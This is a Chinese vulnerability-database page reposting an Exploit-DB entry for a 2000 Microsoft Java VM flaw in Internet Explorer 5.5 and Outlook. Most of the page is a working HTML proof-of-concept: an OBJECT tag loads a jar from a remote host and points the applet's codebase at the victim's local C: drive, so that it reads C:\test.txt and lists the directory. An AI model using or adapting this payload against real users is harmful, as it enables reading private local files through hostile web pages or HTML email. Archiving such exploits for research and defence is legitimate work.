Microsoft Virtual Machine – Arbitrary Java Codebase Execution

Microsoft Virtual Machine – Arbitrary Java Codebase Execution

漏洞ID 1053468 漏洞类型
发布时间 2000-10-18 更新时间 2000-10-18
图片[1]-Microsoft Virtual Machine – Arbitrary Java Codebase Execution-安全小百科CVE编号 N/A
图片[2]-Microsoft Virtual Machine – Arbitrary Java Codebase Execution-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20306
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1812/info

An attacker may gain read access on remote systems by specifying a custom codebase in a Java applet, and delivering to the victim(s) via HTML email or a website. Any arbitrary codebase can be referenced by a java applet that was loaded by an <OBJECT> tag in conjunction with a jar file when using Microsoft Internet Explorer or Outlook/Outlook Express. This allows for the possibility of any known file to be read by a remote attacker.

<HTML>
<HEAD>
<TITLE>
Demo - IE 5.5/Outlook java security vulnerability - reading arbitrary local files and URLs
</TITLE>
</HEAD>
<BODY>
Demo - IE 5.5/Outlook java security vulnerability - reading arbitrary local files and URLs
<BR>
This page reads C:TEST.TXT and displays the directory listing of C:
<BR>
<A HREF="javacodebase1-desc.html">Advisory</A>
<BR>

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>


<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
| <a href="http://www.guninski.com">Home</a> | 
<a href="browsers.html">Internet Explorer</a> | 
<a href="win2k.html">Windows 2000</a> | 
<a href="exploit.html">AIX</a> | 
<a href="netscape.html">Netscape</a> | 
<a href="greets.html">Greets</a> | 
<a href="index.html">More...</a> | 
</center>
</BODY>
</HTML>

相关推荐: HP Laserjet打印机JetDirect cards TCP/IP过滤器错误漏洞

HP Laserjet打印机JetDirect cards TCP/IP过滤器错误漏洞 漏洞ID 1207465 漏洞类型 未知 发布时间 1997-10-04 更新时间 1997-10-04 CVE编号 CVE-1999-1062 CNNVD-ID CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享